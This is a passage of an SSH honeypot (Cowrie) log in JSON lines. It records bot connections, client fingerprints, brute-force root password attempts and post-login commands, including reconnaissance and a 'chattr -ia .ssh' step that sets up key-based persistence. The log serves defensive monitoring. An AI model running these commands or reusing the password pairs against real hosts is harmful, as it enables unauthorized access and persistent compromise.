{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.307889Z","src_ip":"172.236.228.229","session":"4cf93f9cd040"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.308766Z","src_ip":"172.236.228.229","session":"4cf93f9cd040"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58142,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f39832d0fe6","protocol":"ssh","message":"New connection: 212.227.235.229:58142 (1.2.3.4:22) [session: 0f39832d0fe6]","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.495131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.496187Z","src_ip":"212.227.235.229","session":"0f39832d0fe6"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.229","src_port":21366,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c918aaa02ce","protocol":"ssh","message":"New connection: 172.236.228.229:21366 (1.2.3.4:22) [session: 6c918aaa02ce]","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.650512Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003C\u0003\u0001c$FG\\xe4D\\x92\\xbc\\x8f\\xfa\u000e\u051d2c~\u0005\\xfc\\x96f\\xf3\\xbc\\x9b:X\t\\xc48n\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003C\u0003\u0001c$FG\\xe4D\\x92\\xbc\\x8f\\xfa\u000e\u051d2c~\u0005\\xfc\\x96f\\xf3\\xbc\\x9b:X\t\\xc48n\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.651453Z","src_ip":"172.236.228.229","session":"6c918aaa02ce"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.652414Z","src_ip":"172.236.228.229","session":"6c918aaa02ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.797311Z","src_ip":"212.227.235.229","session":"0f39832d0fe6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39480,"dst_ip":"1.2.3.4","dst_port":22,"session":"408ae523425e","protocol":"ssh","message":"New connection: 212.227.235.229:39480 (1.2.3.4:22) [session: 408ae523425e]","sensor":"my-vps","timestamp":"2025-08-31T00:42:37.760733Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33466,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0e26b531487","protocol":"ssh","message":"New connection: 212.227.125.160:33466 (1.2.3.4:22) [session: b0e26b531487]","sensor":"my-vps","timestamp":"2025-08-31T00:42:37.846731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:37.847699Z","src_ip":"212.227.125.160","session":"b0e26b531487"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:37.921402Z","src_ip":"212.227.125.160","session":"b0e26b531487"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:42:38.043087Z","src_ip":"212.227.235.229","session":"0f39832d0fe6"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:38.143421Z","src_ip":"212.227.125.160","session":"b0e26b531487"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:38.345502Z","src_ip":"212.227.235.229","session":"0f39832d0fe6"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:38.349055Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48666,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c6618992536","protocol":"ssh","message":"New connection: 212.227.125.160:48666 (1.2.3.4:22) [session: 6c6618992536]","sensor":"my-vps","timestamp":"2025-08-31T00:42:38.668068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:39.239961Z","src_ip":"212.227.235.229","session":"408ae523425e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:42:39.240615Z","src_ip":"212.227.235.229","session":"408ae523425e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:39.263715Z","src_ip":"212.227.125.160","session":"b0e26b531487"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:39.562615Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:39.563343Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"12345","message":"login attempt [daemon/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:44.478522Z","src_ip":"212.227.235.229","session":"408ae523425e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:46.343072Z","src_ip":"212.227.235.229","session":"408ae523425e"}
{"eventid":"cowrie.login.success","username":"root","password":"focvs2019","message":"login attempt [root/focvs2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:42:46.948934Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34106,"dst_ip":"1.2.3.4","dst_port":22,"session":"64b6ec835c01","protocol":"ssh","message":"New connection: 212.227.125.160:34106 (1.2.3.4:22) [session: 64b6ec835c01]","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.232183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.233174Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.307160Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.536144Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:42:48.857528Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.858391Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.933239Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:48.934694Z","src_ip":"212.227.125.160","session":"64b6ec835c01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:42:50.017690Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T00:42:50.018384Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:51.805139Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:51.806311Z","src_ip":"212.227.125.160","session":"6c6618992536"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43206,"dst_ip":"1.2.3.4","dst_port":22,"session":"008f17cb3e9d","protocol":"ssh","message":"New connection: 212.227.235.229:43206 (1.2.3.4:22) [session: 008f17cb3e9d]","sensor":"my-vps","timestamp":"2025-08-31T00:42:57.759670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:42:57.760428Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:42:58.038597Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35888,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9da96624a3d","protocol":"ssh","message":"New connection: 201.148.180.50:35888 (1.2.3.4:22) [session: c9da96624a3d]","sensor":"my-vps","timestamp":"2025-08-31T00:42:58.673236Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55560,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6c377e1303f","protocol":"ssh","message":"New connection: 212.227.125.160:55560 (1.2.3.4:22) [session: c6c377e1303f]","sensor":"my-vps","timestamp":"2025-08-31T00:42:58.689767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:58.690401Z","src_ip":"212.227.125.160","session":"c6c377e1303f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:58.763618Z","src_ip":"212.227.125.160","session":"c6c377e1303f"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:58.984392Z","src_ip":"212.227.125.160","session":"c6c377e1303f"}
{"eventid":"cowrie.login.success","username":"root","password":"dell@2023","message":"login attempt [root/dell@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:42:59.191503Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:59.660880Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:59.661578Z","src_ip":"201.148.180.50","session":"c9da96624a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:42:59.766194Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:42:59.767133Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:42:59.768104Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58942,"dst_ip":"1.2.3.4","dst_port":22,"session":"163f9aa422ca","protocol":"ssh","message":"New connection: 212.227.125.160:58942 (1.2.3.4:22) [session: 163f9aa422ca]","sensor":"my-vps","timestamp":"2025-08-31T00:42:59.977631Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:00.048331Z","src_ip":"212.227.235.229","session":"008f17cb3e9d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:00.076205Z","src_ip":"212.227.125.160","session":"c6c377e1303f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:00.544001Z","src_ip":"212.227.125.160","session":"163f9aa422ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-